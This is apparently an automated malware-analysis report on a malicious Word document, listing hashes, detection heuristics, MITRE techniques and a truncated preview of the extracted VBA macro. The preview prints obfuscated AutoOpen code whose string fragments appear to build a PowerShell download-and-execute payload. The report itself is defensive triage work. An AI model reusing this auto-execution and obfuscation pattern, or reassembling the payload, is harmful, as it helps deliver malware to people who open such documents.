Office (OLE) malware analysis — malicious · f8b563cf916bfa94

MALICIOUS

Office (OLE)

189.5 KB Created: 2017-12-21 17:37:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: c9949cffe4462c2af313c7745a41b353 SHA-1: b66b1f5de324b867ec994611ae0e78a4e443347d SHA-256: f8b563cf916bfa94d42076e3fc2ab0a59cd1bfa9974311fab8868db35a0f92ab

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute a secondary payload. The presence of an embedded URL suggests a download or redirection mechanism. The ClamAV detection name 'Img.Dropper.PhishingLure' further supports a phishing or lure-based dropper functionality.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://lo8nK+8nKo8n In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 70006 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	70006 bytes
SHA-256: `e0b7776c155e95e57eda5d6e0301f4393e44b027f5fb6ed311e5c464a0bac158`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "twawakjd" Sub AutoOpen() On Error Resume Next icFAHRqJn = 871 / Rnd(4) + QuDQzNchXXHouI + RwAkjjhBsPtw * 9 + Int(DzpObtTWJtIj * CStr(YzDpqiwNpUp)) + HNitKBGOsi * CDate(3624 - 352183467 * 84 / 475) / itMAoQHDsB - CSng(620) AIhwDZLBW = 871 / Rnd(4) + fzpTjkcws + UntbVwd * 9 + Int(IzhQzWHFAvHb * CStr(NVRsjDtUEnJLph)) + OGdHwctZ * CDate(3624 - 352183467 * 84 / 475) / OBSMakhrQHG - CSng(620) SbimskNDJ = 871 / Rnd(4) + EIpvquSAfR + wmihkjtUGR * 9 + Int(iatmXrOMOpPGJt * CStr(RjpOqlpmVpE)) + HDUjDGJ * CDate(3624 - 352183467 * 84 / 475) / PBEXblTCihf - CSng(620) UoHPJirbK = 871 / Rnd(4) + nYwSmHIuGLzzT + PfSnFRmIo * 9 + Int(jPznKEMf * CStr(hcdHEoiKIYVfUV)) + zdLDVsFijmiWHV * CDate(3624 - 352183467 * 84 / 475) / BzUAllmYOwbH - CSng(620) ikTiOuFnj = 871 / Rnd(4) + IKGcztUVSWpYX + LUkJNFzEul * 9 + Int(uQITcBhDIqJ * CStr(JntEsjESFNzSu)) + wabvDPVA * CDate(3624 - 352183467 * 84 / 475) / dLBqVHV - CSng(620) Application.Run "iwdTFiPntrh", SEwawinqQWs OiBbbVTBE = 871 / Rnd(4) + pSVhTqZREG + MmuXIkQsqqi * 9 + Int(kwSQTjbG * CStr(qjaCfVKVcY)) + BtBsHDTkD * CDate(3624 - 352183467 * 84 / 475) / OhHIkiAZ - CSng(620) GidzCWGUU = 871 / Rnd(4) + PGXOSSJrwaI + QqDRcwSuu * 9 + Int(JvWqnBrflnjq * CStr(zkzOoztmaQ)) + RmwktHBaicwcs * CDate(3624 - 352183467 * 84 / 475) / iHzQpVjZVFj - CSng(620) ckivAAjif = 871 / Rnd(4) + AEGmdmIIsB + HmJrtVlv * 9 + Int(rQrEQXXf * CStr(cNzNDiDtiLiX)) + cDXVzUDHf * CDate(3624 - 352183467 * 84 / 475) / iUjjNCVFPdaQnK - CSng(620) uifoAqZMo = 871 / Rnd(4) + onjvZCbazPO + XupqJFTtqMQMa * 9 + Int(oPGoYWjGv * CStr(VajMCATYvB)) + lwJhTtuj * CDate(3624 - 352183467 * 84 / 475) / XTUKOLTIqsM - CSng(620) RzPVjZGqq = 871 / Rnd(4) + rQZEDQwHFclXT + BFVzqjL * 9 + Int(DouljoztmEsj * CStr(DvGLvWBlQbt)) + NTiDIzJhJNk * CDate(3624 - 352183467 * 84 / 475) / RhIJLqji - CSng(620) End Sub Function SEwawinqQWs() On Error Resume Next jwKzYwZaGT = 871 / Rnd(4) + PFjiEIEwillHV + wSiErkCDPiBGh * 9 + Int(siizrUtXh * CStr(sluJrsHtjF)) + jLSwzoLq * CDate(3624 - 352183467 * 84 / 475) / jwapFDHlQAzYkM - CSng(620) hRBaK = 871 / Rnd(4) + AhQTjmzchh + ZTCszIkPnX * 9 + Int(HmZihAYjnCljK * CStr(scCKfTuZBob)) + IcOEztwI * CDate(3624 - 352183467 * 84 / 475) / dtAEzEBuWok - CSng(620) jCfjHAn = Mid("1V8i8nK/xum8nK+8nKi8nK+8nKA/r8nK+8nKKA.'+'Splitc56wvZnhjJlIbVuO4o9iR1c3PqWpIlzzH", 5, 43) LzwfsD = 871 / Rnd(4) + GqtLXbIW + GJTMDrfihjp * 9 + Int(KEEokWdjHjwzFq * CStr(vzSWYcwi)) + jviYUPrBWSwmpX * CDate(3624 - 352183467 * 84 / 475) / EfnUXLTGNiki - CSng(620) JUOtjGfLzbf = 871 / Rnd(4) + dLPIYlIGZ + kARPCjUZ * 9 + Int(BfGautfYEG * CStr(ivzNvQPG)) + hKEDzzuGN * CDate(3624 - 352183467 * 84 / 475) / cEOfPiWkUPt - CSng(620) Olovk = 871 / Rnd(4) + MRRLVIEpn + Osswdnt * 9 + Int(GbjRsoiLjQ * CStr(VqkjcoEBkQjTw)) + aZciOqTTL * CDate(3624 - 352183467 * 84 / 475) / GhvYcjJZoBR - CSng(620) EmJAvzS = Mid("RdjYCSUVmGwfNsVCBCvtKJXKe(8nK+8nKlR'+'eab8nK+8nKc.ToS'+'8nK+8nKtring(), l8nK+8nKR8nK+8nKehua8nK+8nK'+'s);InMYD+MYDvo8nK+8nKke-Ite8nK+8nKm(8nK+8n'+'KMYD+MYDlRehu8'+'nK+8nKas);bre8nKUoUUESPkaDT", 24, 157) PMuEDSNC = 871 / Rnd(4) + EzSioAETl + OHorbDczw * 9 + Int(LadDPQjfZf * CStr(qYUGElTJuCtsKp)) + rYGTIXRU * CDate(3624 - 352183467 * 84 / 475) / dVPOYQZ - CSng(620) jwUAFd = 871 / Rnd(4) + fzlAWnEXnLFijf + zkXbJDmRsW * 9 + Int(wEvjnEQzXEU * CStr(jNkLNnaSaHbESC)) + Jssftiqqz * CDate(3624 - 352183467 * 84 / 475) / HYBShIQilnN - CSng(620) hwssBTiJ = 871 / Rnd(4) + FXYjTkWSIoDWSi + OIYKYFXWZ * 9 + Int(SciVEkd * CStr(wmnQXXokBzj)) + wjvDBFzGB * CDate(3624 - 352183467 * 84 / 475) / iAzfBHnwDDatT - CSng(620) FsOEw = Mid("TX8HuQjFnii+8nK'+'MYD+MYDak;}ca8nK+8nKtc8nK+8nKh{wri8nK+8nKt8nK+8nKus3zzRmHijiO8dWzJY9J7TWJK", 12, 56) UNFiGoV = 871 / Rnd(4) + sZiSEFpdrN + lGGiYbUtWkjF * 9 + Int(YztzKZjOF * CStr(ATBaakBWktoP)) + bdrDRuqo * CDate(3624 - 352183467 * 84 / ... (truncated)

SHA-256: e0b7776c155e95e57eda5d6e0301f4393e44b027f5fb6ed311e5c464a0bac158

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "twawakjd"
Sub AutoOpen()
On Error Resume Next
icFAHRqJn = 871 / Rnd(4) + QuDQzNchXXHouI + RwAkjjhBsPtw * 9 + Int(DzpObtTWJtIj * CStr(YzDpqiwNpUp)) + HNitKBGOsi * CDate(3624 - 352183467 * 84 / 475) / itMAoQHDsB - CSng(620)
AIhwDZLBW = 871 / Rnd(4) + fzpTjkcws + UntbVwd * 9 + Int(IzhQzWHFAvHb * CStr(NVRsjDtUEnJLph)) + OGdHwctZ * CDate(3624 - 352183467 * 84 / 475) / OBSMakhrQHG - CSng(620)
SbimskNDJ = 871 / Rnd(4) + EIpvquSAfR + wmihkjtUGR * 9 + Int(iatmXrOMOpPGJt * CStr(RjpOqlpmVpE)) + HDUjDGJ * CDate(3624 - 352183467 * 84 / 475) / PBEXblTCihf - CSng(620)
UoHPJirbK = 871 / Rnd(4) + nYwSmHIuGLzzT + PfSnFRmIo * 9 + Int(jPznKEMf * CStr(hcdHEoiKIYVfUV)) + zdLDVsFijmiWHV * CDate(3624 - 352183467 * 84 / 475) / BzUAllmYOwbH - CSng(620)
ikTiOuFnj = 871 / Rnd(4) + IKGcztUVSWpYX + LUkJNFzEul * 9 + Int(uQITcBhDIqJ * CStr(JntEsjESFNzSu)) + wabvDPVA * CDate(3624 - 352183467 * 84 / 475) / dLBqVHV - CSng(620)
Application.Run "iwdTFiPntrh", SEwawinqQWs
OiBbbVTBE = 871 / Rnd(4) + pSVhTqZREG + MmuXIkQsqqi * 9 + Int(kwSQTjbG * CStr(qjaCfVKVcY)) + BtBsHDTkD * CDate(3624 - 352183467 * 84 / 475) / OhHIkiAZ - CSng(620)
GidzCWGUU = 871 / Rnd(4) + PGXOSSJrwaI + QqDRcwSuu * 9 + Int(JvWqnBrflnjq * CStr(zkzOoztmaQ)) + RmwktHBaicwcs * CDate(3624 - 352183467 * 84 / 475) / iHzQpVjZVFj - CSng(620)
ckivAAjif = 871 / Rnd(4) + AEGmdmIIsB + HmJrtVlv * 9 + Int(rQrEQXXf * CStr(cNzNDiDtiLiX)) + cDXVzUDHf * CDate(3624 - 352183467 * 84 / 475) / iUjjNCVFPdaQnK - CSng(620)
uifoAqZMo = 871 / Rnd(4) + onjvZCbazPO + XupqJFTtqMQMa * 9 + Int(oPGoYWjGv * CStr(VajMCATYvB)) + lwJhTtuj * CDate(3624 - 352183467 * 84 / 475) / XTUKOLTIqsM - CSng(620)
RzPVjZGqq = 871 / Rnd(4) + rQZEDQwHFclXT + BFVzqjL * 9 + Int(DouljoztmEsj * CStr(DvGLvWBlQbt)) + NTiDIzJhJNk * CDate(3624 - 352183467 * 84 / 475) / RhIJLqji - CSng(620)
End Sub
Function SEwawinqQWs()
On Error Resume Next
jwKzYwZaGT = 871 / Rnd(4) + PFjiEIEwillHV + wSiErkCDPiBGh * 9 + Int(siizrUtXh * CStr(sluJrsHtjF)) + jLSwzoLq * CDate(3624 - 352183467 * 84 / 475) / jwapFDHlQAzYkM - CSng(620)
hRBaK = 871 / Rnd(4) + AhQTjmzchh + ZTCszIkPnX * 9 + Int(HmZihAYjnCljK * CStr(scCKfTuZBob)) + IcOEztwI * CDate(3624 - 352183467 * 84 / 475) / dtAEzEBuWok - CSng(620)
jCfjHAn = Mid("1V8i8nK/xum8nK+8nKi8nK+8nKA/r8nK+8nKKA.'+'Splitc56wvZnhjJlIbVuO4o9iR1c3PqWpIlzzH", 5, 43)
LzwfsD = 871 / Rnd(4) + GqtLXbIW + GJTMDrfihjp * 9 + Int(KEEokWdjHjwzFq * CStr(vzSWYcwi)) + jviYUPrBWSwmpX * CDate(3624 - 352183467 * 84 / 475) / EfnUXLTGNiki - CSng(620)
JUOtjGfLzbf = 871 / Rnd(4) + dLPIYlIGZ + kARPCjUZ * 9 + Int(BfGautfYEG * CStr(ivzNvQPG)) + hKEDzzuGN * CDate(3624 - 352183467 * 84 / 475) / cEOfPiWkUPt - CSng(620)
Olovk = 871 / Rnd(4) + MRRLVIEpn + Osswdnt * 9 + Int(GbjRsoiLjQ * CStr(VqkjcoEBkQjTw)) + aZciOqTTL * CDate(3624 - 352183467 * 84 / 475) / GhvYcjJZoBR - CSng(620)
EmJAvzS = Mid("RdjYCSUVmGwfNsVCBCvtKJXKe(8nK+8nKlR'+'eab8nK+8nKc.ToS'+'8nK+8nKtring(), l8nK+8nKR8nK+8nKehua8nK+8nK'+'s);InMYD+MYDvo8nK+8nKke-Ite8nK+8nKm(8nK+8n'+'KMYD+MYDlRehu8'+'nK+8nKas);bre8nKUoUUESPkaDT", 24, 157)
PMuEDSNC = 871 / Rnd(4) + EzSioAETl + OHorbDczw * 9 + Int(LadDPQjfZf * CStr(qYUGElTJuCtsKp)) + rYGTIXRU * CDate(3624 - 352183467 * 84 / 475) / dVPOYQZ - CSng(620)
jwUAFd = 871 / Rnd(4) + fzlAWnEXnLFijf + zkXbJDmRsW * 9 + Int(wEvjnEQzXEU * CStr(jNkLNnaSaHbESC)) + Jssftiqqz * CDate(3624 - 352183467 * 84 / 475) / HYBShIQilnN - CSng(620)
hwssBTiJ = 871 / Rnd(4) + FXYjTkWSIoDWSi + OIYKYFXWZ * 9 + Int(SciVEkd * CStr(wmnQXXokBzj)) + wjvDBFzGB * CDate(3624 - 352183467 * 84 / 475) / iAzfBHnwDDatT - CSng(620)
FsOEw = Mid("TX8HuQjFnii+8nK'+'MYD+MYDak;}ca8nK+8nKtc8nK+8nKh{wri8nK+8nKt8nK+8nKus3zzRmHijiO8dWzJY9J7TWJK", 12, 56)
UNFiGoV = 871 / Rnd(4) + sZiSEFpdrN + lGGiYbUtWkjF * 9 + Int(YztzKZjOF * CStr(ATBaakBWktoP)) + bdrDRuqo * CDate(3624 - 352183467 * 84 / 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.